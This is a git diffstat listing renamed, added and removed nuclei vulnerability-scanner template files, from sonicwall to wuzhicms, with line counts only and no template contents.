.../sonicwall-sslvpn-shellshock-10393.yaml | 26 - .../Other/spectracom-default-login-10406.yaml | 45 + .../Other/spectracom-default-login.yaml | 41 - ...er-login.yaml => sphider-login-10410.yaml} | 0 ...spidercontrol-scada-server-info-10413.yaml | 5 +- .../Other/splunk-enterprise-login-panel.yaml | 30 - .../Other/splunk-enterprise-panel.yaml | 31 + .../Other/splunk-login-10416.yaml | 24 + .../Other/splunk-login-10418.yaml | 24 - ...sponip-network-system-ping-rce-10421.yaml} | 0 .../spoofable-spf-records-ptr-10424.yaml | 25 - .../spoofable-spf-records-ptr-10426.yaml | 19 + .../spring-framework-exceptions-10493.yaml | 24 - .../Other/spring-framework-exceptions.yaml | 24 + .../Other/spring-functions-rce.yaml | 46 - .../Other/springForShell-CVE-2022-22965.yaml | 32 +- nuclei-templates/Other/spring_collection.yaml | 86 - .../Other/springboot-actuator-10434.yaml | 34 - .../Other/springboot-actuator-10435.yaml | 27 + ...pringboot-actuators-jolokia-xxe-10428.yaml | 27 - ...pringboot-actuators-jolokia-xxe-10429.yaml | 31 + .../Other/springboot-autoconfig-10437.yaml | 28 + .../Other/springboot-autoconfig.yaml | 24 - ...10441.yaml => springboot-beans-10438.yaml} | 0 .../Other/springboot-env-10450.yaml | 34 - .../Other/springboot-env-10451.yaml | 37 + .../Other/springboot-gateway-10453.yaml | 35 - .../Other/springboot-gateway.yaml | 29 + .../Other/springboot-h2-db-rce-10454.yaml | 40 - .../Other/springboot-h2-db-rce-10455.yaml | 37 + .../Other/springboot-health-10460.yaml | 28 - nuclei-templates/Other/springboot-health.yaml | 24 + .../Other/springboot-heapdump-10465.yaml | 60 - .../Other/springboot-httptrace-10468.yaml | 8 +- .../Other/springboot-info-10470.yaml | 31 - nuclei-templates/Other/springboot-info.yaml | 32 + .../Other/springboot-log4j-rce-10472.yaml | 47 - .../Other/springboot-log4j-rce.yaml | 41 + .../Other/springboot-loggers-10475.yaml | 34 + .../Other/springboot-loggers.yaml | 29 - ...78.yaml => springboot-mappings-10480.yaml} | 0 
.../Other/springboot-metrics-10483.yaml | 5 +- .../Other/springboot-threaddump-10486.yaml | 37 - .../Other/springboot-threaddump.yaml | 32 + .../Other/springboot-trace-10488.yaml | 36 - .../Other/springboot-trace-10492.yaml | 31 + nuclei-templates/Other/sql-dump-10496.yaml | 46 - nuclei-templates/Other/sql-dump.yaml | 47 + nuclei-templates/Other/sql-monitor-10505.yaml | 20 + nuclei-templates/Other/sql-monitor.yaml | 20 - ...0.yaml => sql-server-reporting-10508.yaml} | 0 .../Other/{sql-injection.yaml => sqli.yaml} | 0 ...sqli_header-10504.yaml => sqliheader.yaml} | 0 ...1).yaml => square-access-token-11867.yaml} | 0 .../Other/square-oauth-secret(1).yaml | 3 - nuclei-templates/Other/square.yaml | 25 + ...squid-analysis-report-generator-10512.yaml | 32 + ...squid-analysis-report-generator-10513.yaml | 37 - .../Other/squirrelmail-add-xss-10515.yaml | 26 - .../Other/squirrelmail-add-xss.yaml | 25 + .../Other/squirrelmail-lfi-10517.yaml | 22 + nuclei-templates/Other/squirrelmail-lfi.yaml | 29 - .../Other/squirrelmail-login-10519.yaml | 12 +- .../squirrelmail-vkeyboard-xss-10522.yaml | 26 + .../Other/squirrelmail-vkeyboard-xss.yaml | 25 - .../Other/ssrf-via-oauth-misconfig-10526.yaml | 30 + .../Other/ssrf-via-oauth-misconfig-10527.yaml | 34 - .../{ssrf-detection.yaml => ssrf_nagli.yaml} | 0 nuclei-templates/Other/ssti-jinja2.yaml | 3 + .../Other/stackstorm-default-login-10529.yaml | 41 + .../Other/stackstorm-default-login-10530.yaml | 41 - .../stem-audio-table-private-keys-10536.yaml | 28 - .../Other/stem-audio-table-private-keys.yaml | 27 + .../Other/strapi-cms-detect-10540.yaml | 3 +- .../Other/strapi-documentation-10542.yaml | 34 + .../Other/strapi-documentation-10543.yaml | 33 - nuclei-templates/Other/strapi-page-10545.yaml | 16 + nuclei-templates/Other/strapi-page.yaml | 19 - .../Other/strikingly-takeover-10552.yaml | 2 +- ...-key(1).yaml => stripe-api-key-11869.yaml} | 0 .../Other/stripe-restricted-key-10555.yaml | 17 - .../Other/stripe-restricted-key.yaml | 15 + 
...-key-10558.yaml => stripe-secret-key.yaml} | 0 .../Other/{api-stripe.yaml => stripe.yaml} | 0 .../Other/struts-debug-mode-10560.yaml | 19 + .../Other/struts-debug-mode-10561.yaml | 16 - .../Other/struts-problem-report-10563.yaml | 19 + .../Other/struts-problem-report.yaml | 20 - .../Other/submitty-login-10568.yaml | 2 +- .../Other/sugarcrm-panel-10569.yaml | 27 + .../Other/sugarcrm-panel-10571.yaml | 22 - .../Other/supermicro-default-login-10572.yaml | 39 - .../Other/supermicro-default-login.yaml | 36 + .../Other/superset-default-login-10574.yaml | 67 + .../Other/superset-default-login.yaml | 59 - .../Other/supervpn-panel-10575.yaml | 15 - .../Other/supervpn-panel-10577.yaml | 14 + .../Other/surveygizmo-takeover-10583.yaml | 8 +- .../suspicious-sql-error-messages-10585.yaml | 32 + .../suspicious-sql-error-messages-10586.yaml | 32 - ...-api-10595.yaml => swagger-api-10592.yaml} | 0 nuclei-templates/Other/swagger-ui-bypass.yaml | 83 + .../Other/symantec-dlp-login-10596.yaml | 21 + .../Other/symantec-dlp-login.yaml | 20 - .../Other/symantec-epm-login-10602.yaml | 20 + .../Other/symantec-epm-login.yaml | 21 - .../Other/symantec-ewep-login-10605.yaml | 20 - .../Other/symantec-ewep-login.yaml | 21 + .../symantec-messaging-gateway-10607.yaml | 22 - .../symantec-pgp-global-directory-10611.yaml | 21 + .../symantec-pgp-global-directory-10613.yaml | 20 - .../Other/symfony-database-config-10616.yaml | 28 - .../Other/symfony-database-config-10617.yaml | 17 + .../Other/symfony-debugmode-10618.yaml | 29 - .../Other/symfony-debugmode-10623.yaml | 25 + .../Other/symfony-profiler-10625.yaml | 19 + .../Other/symfony-profiler-10626.yaml | 20 - .../Other/synology-web-station-10631.yaml | 19 - .../Other/synology-web-station-10632.yaml | 24 + nuclei-templates/Other/sysaid-help-desk.yaml | 21 + ...gin.yaml => szhe-default-login-10638.yaml} | 0 .../Other/tableau-panel-10642.yaml | 25 - nuclei-templates/Other/tableau-panel.yaml | 21 + ...amronos iptv\347\263\273\347\273\237.yaml" | 20 + 
...ronos-rce-10649.yaml => tamronos-rce.yaml} | 0 .../Other/targa-camera-lfi-10654.yaml | 10 +- .../Other/targa-camera-ssrf-10657.yaml | 23 - nuclei-templates/Other/targa-camera-ssrf.yaml | 22 + nuclei-templates/Other/tcpconfig-10663.yaml | 19 - nuclei-templates/Other/tcpconfig-10665.yaml | 19 + .../teamcity-registration-enabled-10667.yaml | 28 - .../Other/teamcity-registration-enabled.yaml | 30 + .../Other/teamwork-takeover-10669.yaml | 15 + .../Other/teamwork-takeover-10671.yaml | 16 - nuclei-templates/Other/tech-detect-10672.yaml | 2678 - nuclei-templates/Other/tech-detect-10673.yaml | 2730 + .../Other/tectuus-scada-monitor-10682.yaml | 25 - .../Other/tectuus-scada-monitor.yaml | 25 + .../Other/tekon-info-leak-10685.yaml | 36 - nuclei-templates/Other/tekon-info-leak.yaml | 30 + .../telerik-dialoghandler-detect-10688.yaml | 6 +- .../telerik-fileupload-detect-10692.yaml | 17 - .../telerik-fileupload-detect-10694.yaml | 14 + ...{Tenda-leakage.yaml => tenda-leakage.yaml} | 0 ...i-pcoip-10702.yaml => teradici-pcoip.yaml} | 0 .../Other/terraform-detect-10709.yaml | 22 + nuclei-templates/Other/terraform-detect.yaml | 22 - .../terraform-enterprise-panel-10712.yaml | 31 + .../Other/terraform-enterprise-panel.yaml | 27 - nuclei-templates/Other/the-next.yaml | 59 + ...cmf_include.yaml => thinkCMF_include.yaml} | 0 nuclei-templates/Other/thinkcmf-detect.yaml | 20 - .../Other/thinkcmf-detection-10719.yaml | 20 + .../Other/thinkcmf-lfi (copy 1).yaml | 24 - .../Other/thinkcmf-rce-10725.yaml | 24 + .../Other/thinkcmf-rce-10729.yaml | 31 - .../Other/thinkcmf-workflow-10730.yaml | 10 + nuclei-templates/Other/thinkcmf-workflow.yaml | 10 - .../Other/thinkific-redirect-10736.yaml | 24 - .../Other/thinkific-redirect-10737.yaml | 20 + nuclei-templates/Other/thinkphp-2-rce.yaml | 50 +- .../Other/thinkphp-5022-rce-10746.yaml | 27 - .../Other/thinkphp-5022-rce-10747.yaml | 23 + .../Other/thinkphp-5023-rce-10749.yaml | 25 + .../Other/thinkphp-5023-rce-10751.yaml | 32 - 
...kphp-509-information-disclosure-10752.yaml | 22 - ...kphp-509-information-disclosure-10753.yaml | 22 + .../Other/threatq-login-10757.yaml | 34 + nuclei-templates/Other/threatq-login.yaml | 29 - .../Other/thumbs-db-disclosure-10761.yaml | 20 + .../Other/thumbs-db-disclosure-10762.yaml | 24 - .../Other/tianqing-info-leak-10765.yaml | 33 + .../Other/tianqing-info-leak.yaml | 28 - ...10769.yaml => tictail-takeover-10768.yaml} | 0 ...idb-unauth-10772.yaml => tidb-unauth.yaml} | 0 .../Other/tikiwiki-cms-10774.yaml | 23 + .../Other/tikiwiki-cms-10775.yaml | 20 - .../Other/tikiwiki-reflected-xss-10777.yaml | 27 + .../Other/tikiwiki-reflected-xss-10779.yaml | 24 - .../Other/tilda-takeover-10781.yaml | 20 + .../Other/tilda-takeover-10782.yaml | 20 - ...gl-10786.yaml => tileserver-gl-10787.yaml} | 0 nuclei-templates/Other/time-based-sqli.yaml | 33 - .../Other/tin-canny-learndash-reporting.yaml | 59 + .../Other/{api-tinypng.yaml => tinypng.yaml} | 0 ...it-web-rce.yaml => titannit-web-ssrf.yaml} | 0 .../Other/tomcat-default-login-10788.yaml | 69 - .../Other/tomcat-default-login-10789.yaml | 65 + ...t-detect.yaml => tomcat-detect-10794.yaml} | 0 .../Other/tomcat-pathnormalization-10799.yaml | 18 + .../Other/tomcat-pathnormalization-10800.yaml | 28 - ...scripts-10801.yaml => tomcat-scripts.yaml} | 0 ...rkflow-10805.yaml => tomcat-workflow.yaml} | 0 .../Other/top-xss-params-10809.yaml | 81 + nuclei-templates/Other/top-xss-params.yaml | 75 - .../Other/tor-socks-proxy-10813.yaml | 4 - nuclei-templates/Other/tos.yaml | 21 + ...etect-10825.yaml => trace-axd-detect.yaml} | 0 .../Other/trace-method-10827.yaml | 26 - .../Other/trace-method-10829.yaml | 27 + .../Other/traefik-dashboard-10832.yaml | 2 + ...-ci-disclosure.yaml => travis-config.yaml} | 0 ...l => trilithic-viewpoint-login-10839.yaml} | 0 ...aml => tugboat-config-exposure-10843.yaml} | 0 ...keover-10845.yaml => tumblr-takeover.yaml} | 0 .../Other/turbocrm-xss-10848.yaml | 26 + .../Other/turbocrm-xss-10850.yaml | 32 - 
.../tuxedo-connected-controller-10852.yaml | 3 +- .../Other/twig-php-ssti-10856.yaml | 14 - .../Other/twig-php-ssti-10859.yaml | 22 + nuclei-templates/Other/twilio-api-10861.yaml | 16 - nuclei-templates/Other/twilio-api.yaml | 13 + .../Other/twitter-secret-11870.yaml | 13 + nuclei-templates/Other/twitter-secret.yaml | 16 - nuclei-templates/Other/twitter.yaml | 24 + .../Other/txt-fingerprint-10863.yaml | 25 - nuclei-templates/Other/txt-fingerprint.yaml | 18 + .../Other/uberflip-takeover-10864.yaml | 15 + .../Other/uberflip-takeover-10866.yaml | 19 - ...69.yaml => ucmdb-default-login-10868.yaml} | 0 .../Other/ueditor-file-upload-10876.yaml | 1 + .../ultimatemember-open-redirect-10877.yaml | 18 + .../Other/ultimatemember-open-redirect.yaml | 17 - .../Other/umbraco-base-ssrf-10882.yaml | 24 - nuclei-templates/Other/umbraco-base-ssrf.yaml | 25 + nuclei-templates/Other/umbraco.yaml | 90954 -------- ...{unauth-ftp.yaml => unauth-ftp-10942.yaml} | 0 .../Other/unauth-hoteldruid-panel-10943.yaml | 33 - .../Other/unauth-hoteldruid-panel.yaml | 25 + .../Other/unauth-message-read-10945.yaml | 45 - .../Other/unauth-message-read-10946.yaml | 36 + nuclei-templates/Other/unauth-rlm-10960.yaml | 29 + nuclei-templates/Other/unauth-rlm.yaml | 19 - .../Other/unauth-spark-api-10961.yaml | 22 - .../Other/unauth-spark-api-10963.yaml | 30 + .../Other/unauth-wavink-panel-10967.yaml | 40 + .../Other/unauth-wavink-panel.yaml | 37 - .../Other/unauth-xproxy-dashboard-10968.yaml | 27 + .../Other/unauth-xproxy-dashboard.yaml | 23 - .../unauthenticated-alert-manager-10888.yaml | 20 - .../Other/unauthenticated-alert-manager.yaml | 23 + .../Other/unauthenticated-frp-10896.yaml | 26 + .../Other/unauthenticated-frp-10897.yaml | 21 - .../Other/unauthenticated-glances-10898.yaml | 22 - .../Other/unauthenticated-glances.yaml | 21 + .../Other/unauthenticated-glowroot-10900.yaml | 28 + .../Other/unauthenticated-glowroot-10902.yaml | 27 - .../Other/unauthenticated-influxdb-10903.yaml | 27 + 
.../Other/unauthenticated-influxdb.yaml | 23 - ... => unauthenticated-lansweeper-10906.yaml} | 0 .../unauthenticated-mongo-express-10908.yaml | 24 - .../unauthenticated-mongo-express-10909.yaml | 30 + .../unauthenticated-nacos-access-10912.yaml | 40 + .../Other/unauthenticated-nacos-access.yaml | 34 - .../Other/unauthenticated-netdata-10918.yaml | 31 - .../Other/unauthenticated-netdata.yaml | 26 + .../unauthenticated-popup-upload-10921.yaml | 20 - .../Other/unauthenticated-popup-upload.yaml | 20 + .../Other/unauthenticated-prtg-10926.yaml | 20 - .../Other/unauthenticated-prtg-10927.yaml | 25 + ...thenticated-varnish-cache-purge-10931.yaml | 29 - ...thenticated-varnish-cache-purge-10933.yaml | 25 + .../Other/unauthenticated-zipkin-10935.yaml | 30 - .../Other/unauthenticated-zipkin.yaml | 26 + ...aml => unauthorized-h3csecparh-login.yaml} | 0 ...authorized-hp-officepro-printer-10950.yaml | 24 + .../unauthorized-hp-officepro-printer.yaml | 24 - .../Other/unauthorized-hp-printer-10953.yaml | 4 - .../Other/unauthorized-plastic-scm-10955.yaml | 57 - .../Other/unauthorized-plastic-scm-10957.yaml | 50 + ...ized-puppet-node-manager-detect-10958.yaml | 24 - ...ized-puppet-node-manager-detect-10959.yaml | 20 + ...0970.yaml => unbounce-takeover-10971.yaml} | 0 .../Other/unifi-network-log4j-rce-10975.yaml | 11 +- .../Other/unpatched-coldfusion-10977.yaml | 35 + .../Other/unpatched-coldfusion.yaml | 30 - nuclei-templates/Other/upnp-device-10981.yaml | 30 + nuclei-templates/Other/upnp-device.yaml | 29 - nuclei-templates/Other/ups-status-10985.yaml | 25 + nuclei-templates/Other/ups-status.yaml | 20 - .../Other/uptimerobot-takeover-10987.yaml | 25 - .../Other/uptimerobot-takeover.yaml | 21 + .../Other/urge-takeover-10990.yaml | 18 + nuclei-templates/Other/urge-takeover.yaml | 18 - nuclei-templates/Other/url.yaml | 50 +- ...0994.yaml => vanguard-post-xss-10992.yaml} | 0 ...er-10997.yaml => vend-takeover-10996.yaml} | 0 .../Other/vercel-takeover-11000.yaml | 5 +- 
.../Other/versa-default-login-11003.yaml | 49 - .../Other/versa-default-login.yaml | 46 + nuclei-templates/Other/versa-sdwan-11005.yaml | 19 - nuclei-templates/Other/versa-sdwan.yaml | 16 + .../Other/video-synchro-pdf-lfi-11007.yaml | 9 +- .../Other/vidyo-default-login-11009.yaml | 67 + .../Other/vidyo-default-login-11010.yaml | 60 - ...1012.yaml => viewlinc-crlf-injection.yaml} | 0 ...aml => viewpoint-system-status-11018.yaml} | 0 ...igor-login.yaml => vigor-login-11023.yaml} | 0 ...024.yaml => virtual-ema-detect-11025.yaml} | 0 nuclei-templates/Other/visualstudio.yaml | 26 + .../Other/vmware-horizon-11040.yaml | 24 - .../Other/vmware-horizon-11041.yaml | 20 + .../vmware-horizon-log4j-jndi-rce-11033.yaml | 37 + .../Other/vmware-horizon-log4j-jndi-rce.yaml | 32 - .../Other/vmware-horizon-panel-11035.yaml | 26 + .../Other/vmware-horizon-panel.yaml | 23 - nuclei-templates/Other/vmware-log4j.yaml | 33 - .../Other/vmware-vcenter-lfi-11048.yaml | 32 - ...042.yaml => vmware-vcenter-lfi-linux.yaml} | 0 .../Other/vmware-vcenter-lfi.yaml | 27 + .../Other/vmware-vcenter-log4j-jndi-rce.yaml | 38 + .../Other/vmware-vcenter-ssrf-11051.yaml | 24 - .../Other/vmware-vcenter-ssrf.yaml | 21 + .../Other/vmware-vrealize-detect.yaml | 43 +- .../Other/vmware-vsphere-web-client.yaml | 19 + nuclei-templates/Other/vmware-workflow.yaml | 2 +- nuclei-templates/Other/vnc-detect-11061.yaml | 4 - ...4.yaml => voipmonitor-workflow-11065.yaml} | 0 nuclei-templates/Other/voiprce(1).yaml | 38 - .../Other/vpms-auth-bypass-11066.yaml | 35 + nuclei-templates/Other/vpms-auth-bypass.yaml | 31 - .../vrealize-operations-log4j-rce-11070.yaml | 17 +- .../Other/vsftpd-detection-11074.yaml | 17 + nuclei-templates/Other/vsftpd-detection.yaml | 17 - ...1.yaml => w3c-total-cache-ssrf-11077.yaml} | 0 ...adl-api-11085.yaml => wadl-api-11082.yaml} | 0 .../Other/wago-plc-panel-11093.yaml | 25 + nuclei-templates/Other/wago-plc-panel.yaml | 22 - .../wallix-accessmanager-panel-11095.yaml | 34 + 
.../Other/wallix-accessmanager-panel.yaml | 29 - .../wamp-server-configuration-11096.yaml | 44 +- .../Other/wamp-xdebug-detect-11104.yaml | 20 - .../Other/wamp-xdebug-detect.yaml | 17 + ...-rce-2.yaml => wangkang-NS-ASG-rce-2.yaml} | 0 ...g-NGFW-rce.yaml => wangkang-ngfw-rce.yaml} | 0 ...tchguard-credentials-disclosure-11107.yaml | 32 - .../watchguard-credentials-disclosure.yaml | 27 + .../Other/watchguard-panel-11108.yaml | 22 + nuclei-templates/Other/watchguard-panel.yaml | 21 - .../Other/wazuh-detect-11111.yaml | 25 + .../Other/wazuh-detect-11112.yaml | 22 - nuclei-templates/Other/wazuh-panel-11113.yaml | 34 + nuclei-templates/Other/wazuh-panel.yaml | 33 - nuclei-templates/Other/web-config-11126.yaml | 24 + nuclei-templates/Other/web-config-11127.yaml | 19 - .../Other/web-ftp-detect-11138.yaml | 23 + nuclei-templates/Other/web-ftp-detect.yaml | 20 - .../Other/web-suite-detect-11168.yaml | 36 + nuclei-templates/Other/web-suite-detect.yaml | 31 - nuclei-templates/Other/webcamxp-5-11122.yaml | 22 - nuclei-templates/Other/webcamxp-5.yaml | 21 + ...itors-11128.yaml => webeditors-11130.yaml} | 0 .../Other/webflow-takeover-11133.yaml | 19 + .../Other/webflow-takeover-11134.yaml | 15 - ...-11142.yaml => weblogic-detect-11144.yaml} | 0 .../Other/weblogic-iiop-detect-11147.yaml | 24 + .../Other/weblogic-iiop-detect-11148.yaml | 20 - .../Other/weblogic-login-11149.yaml | 25 - nuclei-templates/Other/weblogic-login.yaml | 25 + .../Other/weblogic-t3-detect-11151.yaml | 38 - .../Other/weblogic-t3-detect.yaml | 41 + .../Other/weblogic-weak-login.yaml | 13 +- ...min-panel-11158.yaml => webmin-panel.yaml} | 0 .../Other/webmodule-ee-11162.yaml | 22 + .../Other/webmodule-ee-11164.yaml | 19 - .../Other/webmodule-ee-panel-11161.yaml | 33 + .../Other/webmodule-ee-panel.yaml | 28 - ...talk-leakage.yaml => webtalk-leakage.yaml} | 0 .../Other/webtools-home-11169.yaml | 20 + nuclei-templates/Other/webtools-home.yaml | 20 - nuclei-templates/Other/webui-rce-11170.yaml | 32 - 
nuclei-templates/Other/webui-rce-11172.yaml | 26 + ...webview-addjavascript-interface-11175.yaml | 12 - ...webview-addjavascript-interface-11177.yaml | 16 + ...11181.yaml => webview-load-url-11182.yaml} | 0 .../Other/webview-universal-access-11185.yaml | 16 - .../Other/webview-universal-access.yaml | 13 + ...ekender-newspaper-open-redirect-11188.yaml | 18 + .../weekender-newspaper-open-redirect.yaml | 18 - .../Other/weiphp-sql-injection-11189.yaml | 23 + .../Other/weiphp-sql-injection.yaml | 24 - .../Other/wems-manager-xss-11192.yaml | 25 + .../Other/wems-manager-xss-11194.yaml | 29 - .../Other/werkzeug-debugger-detect-11196.yaml | 6 +- .../Other/wildfly-panel-11209.yaml | 23 + nuclei-templates/Other/wildfly-panel.yaml | 19 - ...xss-11213.yaml => window-name-domxss.yaml} | 0 nuclei-templates/Other/wireless-leakage.yaml | 6 +- .../Other/wix-takeover-11219.yaml | 23 + nuclei-templates/Other/wix-takeover.yaml | 22 - ...etect-11223.yaml => wondercms-detect.yaml} | 0 .../Other/wooyun-2015-148227(1).yaml | 12 +- .../Other/wooyun-2015-148227-11225.yaml | 24 - .../Other/wooyun-path-traversal-11229.yaml | 30 + .../Other/wooyun-path-traversal.yaml | 26 - nuclei-templates/Other/wordpress-LFI.yaml | 21 + .../wordpress-accessible-wpconfig-11234.yaml | 38 - .../wordpress-accessible-wpconfig-11235.yaml | 48 + .../wordpress-affiliatewp-log-11240.yaml | 1 + ...ordpress-bbpress-plugin-listing-11245.yaml | 27 - .../wordpress-bbpress-plugin-listing.yaml | 23 + .../wordpress-db-backup-listing-11250.yaml | 6 +- .../Other/wordpress-db-repair-11252.yaml | 5 + .../Other/wordpress-debug-log-11259.yaml | 25 - .../Other/wordpress-debug-log.yaml | 43 + .../Other/wordpress-detect-11261.yaml | 40 - nuclei-templates/Other/wordpress-detect.yaml | 34 + .../wordpress-directory-listing-11265.yaml | 21 - .../wordpress-directory-listing-11266.yaml | 25 + ...dpress-elementor-plugin-listing-11269.yaml | 7 +- ...emails-verification-for-woocommerce-1.yaml | 29 - .../wordpress-emergency-script-11277.yaml | 
27 - .../Other/wordpress-emergency-script.yaml | 23 + .../Other/wordpress-git-config-11279.yaml | 8 +- ...press-gtranslate-plugin-listing-11282.yaml | 23 - ...press-gtranslate-plugin-listing-11284.yaml | 22 + ...ordpress-infinitewp-auth-bypass-11285.yaml | 50 - ...ordpress-infinitewp-auth-bypass-11288.yaml | 59 + .../Other/wordpress-installer-log-11290.yaml | 21 - .../Other/wordpress-installer-log.yaml | 19 + nuclei-templates/Other/wordpress-lfi.yaml | 25 - .../Other/wordpress-plugins-detect.yaml | 42 + .../Other/wordpress-plugins2.yaml | 27 - .../wordpress-rce-simplefilelist-11302.yaml | 68 - .../wordpress-rce-simplefilelist-11304.yaml | 73 + .../Other/wordpress-rdf-user-enum.yaml | 39 + ...ress-redirection-plugin-listing-11306.yaml | 23 - ...ress-redirection-plugin-listing-11308.yaml | 27 + .../Other/wordpress-takeover-11312.yaml | 23 - .../Other/wordpress-takeover-11313.yaml | 26 + ...aml => wordpress-themes-detect-11316.yaml} | 0 .../Other/wordpress-tmm-db-migrate.yaml | 6 +- .../Other/wordpress-user-enum-11330.yaml | 28 + .../Other/wordpress-user-enum.yaml | 24 - .../wordpress-user-enumeration-11329.yaml | 17 - .../Other/wordpress-user-enumeration.yaml | 19 + .../wordpress-weak-credentials-11334.yaml | 50 + .../Other/wordpress-weak-credentials.yaml | 33 - .../wordpress-woocommerce-listing-11339.yaml | 26 + .../wordpress-woocommerce-listing-11341.yaml | 22 - .../wordpress-woocommerce-sqli-11345.yaml | 43 - .../Other/wordpress-woocommerce-sqli.yaml | 30 + .../Other/wordpress-wordfence-lfi-11351.yaml | 9 +- ...dpress-wordfence-waf-bypass-xss-11353.yaml | 25 - ...dpress-wordfence-waf-bypass-xss-11356.yaml | 24 + .../Other/wordpress-wordfence-xss-11357.yaml | 14 - .../Other/wordpress-wordfence-xss-11362.yaml | 28 + .../Other/wordpress-workflow (copy 1).yaml | 26 +- ...press-wpcourses-info-disclosure-11371.yaml | 34 - .../wordpress-wpcourses-info-disclosure.yaml | 31 + ...> wordpress-xmlrpc-listmethods-11372.yaml} | 0 .../Other/wordpress-zebra-form-xss-11375.yaml | 
38 + .../Other/wordpress-zebra-form-xss-11377.yaml | 34 - .../Other/workresources-rdp-11382.yaml | 24 - nuclei-templates/Other/workresources-rdp.yaml | 20 + ...84.yaml => worksites-detection-11383.yaml} | 0 .../Other/worksites-takeover.yaml | 3 +- .../Other/wowza-streaming-engine-11395.yaml | 20 + .../Other/wowza-streaming-engine-11398.yaml | 23 - .../Other/wp-adaptive-xss-11403.yaml | 5 + ...1405.yaml => wp-altair-listing-11406.yaml} | 0 nuclei-templates/Other/wp-app-log-11413.yaml | 31 + nuclei-templates/Other/wp-app-log.yaml | 25 - ...ing.yaml => wp-arforms-listing-11415.yaml} | 0 .../Other/wp-church-admin-xss-11419.yaml | 30 + .../Other/wp-church-admin-xss-11420.yaml | 29 - .../Other/wp-code-snippets-xss-11425.yaml | 46 - .../Other/wp-code-snippets-xss-11426.yaml | 35 + .../Other/wp-config-setup-11427.yaml | 20 + nuclei-templates/Other/wp-config-setup.yaml | 19 - .../Other/wp-custom-tables-xss-11433.yaml | 25 + .../Other/wp-custom-tables-xss-11434.yaml | 31 - .../Other/wp-detect (copy 1).yaml | 18 - nuclei-templates/Other/wp-detect.yaml | 19 + ...> wp-email-subscribers-listing-11443.yaml} | 0 nuclei-templates/Other/wp-engine-config.yaml | 22 - .../Other/wp-finder-xss-11450.yaml | 8 +- .../Other/wp-flagem-xss-11453.yaml | 24 + nuclei-templates/Other/wp-flagem-xss.yaml | 25 - ...1457.yaml => wp-full-path-disclosure.yaml} | 0 .../Other/wp-grimag-open-redirect.yaml | 8 +- .../wp-gtranslate-open-redirect-11463.yaml | 3 + .../Other/wp-haberadam-idor-11467.yaml | 38 - .../Other/wp-haberadam-idor-11468.yaml | 32 + .../wp-idx-broker-platinum-listing-11469.yaml | 9 +- ...{wp-install-11475.yaml => wp-install.yaml} | 0 .../Other/wp-iwp-client-listing.yaml | 5 +- .../Other/wp-javospot-lfi-11480.yaml | 26 - .../Other/wp-javospot-lfi-11482.yaml | 36 + .../Other/wp-knews-xss-11487.yaml | 8 +- .../Other/wp-license-file-11489.yaml | 4 - .../wp-mailchimp-log-exposure-11492.yaml | 23 + .../wp-mailchimp-log-exposure-11494.yaml | 28 - nuclei-templates/Other/wp-misconfig.yaml | 36 - 
.../Other/wp-mstore-plugin-listing-11501.yaml | 23 - .../Other/wp-mstore-plugin-listing.yaml | 27 + .../Other/wp-multiple-theme-ssrf-11511.yaml | 6 +- .../Other/wp-nextgen-xss-11516.yaml | 25 - .../Other/wp-nextgen-xss-11518.yaml | 24 + .../Other/wp-oxygen-theme-lfi-11522.yaml | 24 + .../Other/wp-oxygen-theme-lfi-11523.yaml | 30 - .../Other/wp-phpfreechat-xss-11527.yaml | 24 - .../Other/wp-phpfreechat-xss-11528.yaml | 29 + .../wp-plugin-1-flashgallery-listing.yaml | 4 + .../Other/wp-plugin-lifterlms-11533.yaml | 23 + .../Other/wp-plugin-lifterlms.yaml | 22 - .../wp-plugin-marmoset-viewer-xss-11537.yaml | 26 + .../wp-plugin-marmoset-viewer-xss-11538.yaml | 22 - .../wp-plugin-utlimate-member-11539.yaml | 27 - .../wp-plugin-utlimate-member-11541.yaml | 22 + nuclei-templates/Other/wp-popup-listing.yaml | 2 +- ...l => wp-prostore-open-redirect-11549.yaml} | 0 .../Other/wp-qards-listing-11551.yaml | 25 + .../Other/wp-qards-listing-11552.yaml | 21 - .../wp-revslider-file-download-11555.yaml | 14 +- .../Other/wp-securimage-xss-11556.yaml | 30 + nuclei-templates/Other/wp-securimage-xss.yaml | 24 - .../wp-security-open-redirect-11561.yaml | 21 + .../Other/wp-security-open-redirect.yaml | 21 - .../Other/wp-sfwd-lms-listing-11564.yaml | 2 +- .../Other/wp-slideshow-xss-11575.yaml | 29 + .../Other/wp-slideshow-xss-11576.yaml | 28 - .../Other/wp-socialfit-xss-11580.yaml | 29 - .../Other/wp-socialfit-xss-11581.yaml | 35 + ...s-11587.yaml => wp-super-forms-11585.yaml} | 0 .../Other/wp-tinymce-lfi-11589.yaml | 25 + .../Other/wp-tinymce-lfi-11591.yaml | 31 - .../Other/wp-tutor-lfi-11598.yaml | 16 - nuclei-templates/Other/wp-tutor-lfi.yaml | 17 + .../Other/wp-upload-data-11602.yaml | 36 + .../Other/wp-upload-data-11605.yaml | 29 - nuclei-templates/Other/wp-userenum.yaml | 93 + .../Other/wp-vault-lfi-11611.yaml | 19 - .../Other/wp-whmcs-xss-11614.yaml | 42 - nuclei-templates/Other/wp-whmcs-xss.yaml | 37 + .../wp-woocommerce-email-verification-1.yaml | 31 + 
...-woocommerce-email-verification-11616.yaml | 29 + ...-woocommerce-email-verification-11619.yaml | 34 - ...-11624.yaml => wp-xmlrpc-brute-force.yaml} | 0 .../wp-xmlrpc-pingback-detection-11628.yaml | 3 - .../Other/wpdm-cache-session-11438.yaml | 27 + .../Other/wpdm-cache-session-11439.yaml | 23 - .../Other/wpengine-config-check.yaml | 22 + .../Other/wpmudev-my-calender-xss-11502.yaml | 29 + .../Other/wpmudev-my-calender-xss-11503.yaml | 24 - .../Other/wpmudev-pub-keys-11507.yaml | 24 - nuclei-templates/Other/wpmudev-pub-keys.yaml | 26 + ....yaml => wptouch-open-redirect-11594.yaml} | 0 .../Other/wptouch-plugin-open-redirect.yaml | 19 - nuclei-templates/Other/wsdl-api-11632.yaml | 17 + nuclei-templates/Other/wsdl-api.yaml | 15 - .../Other/wso2-2019-0598-11635.yaml | 28 - .../Other/wso2-2019-0598-11636.yaml | 24 + ...yaml => wso2-apimanager-detect-11638.yaml} | 0 .../Other/wso2-default-login-11641.yaml | 38 + .../Other/wso2-default-login-11643.yaml | 42 - .../Other/wso2-management-console-11644.yaml | 30 + .../Other/wso2-management-console.yaml | 19 - nuclei-templates/Other/wso2mgmtconsole.yaml | 4 - .../Other/wufoo-takeover-11649.yaml | 21 + .../Other/wufoo-takeover-11651.yaml | 17 - ...-11654.yaml => wuzhicms-detect-11655.yaml} | 0 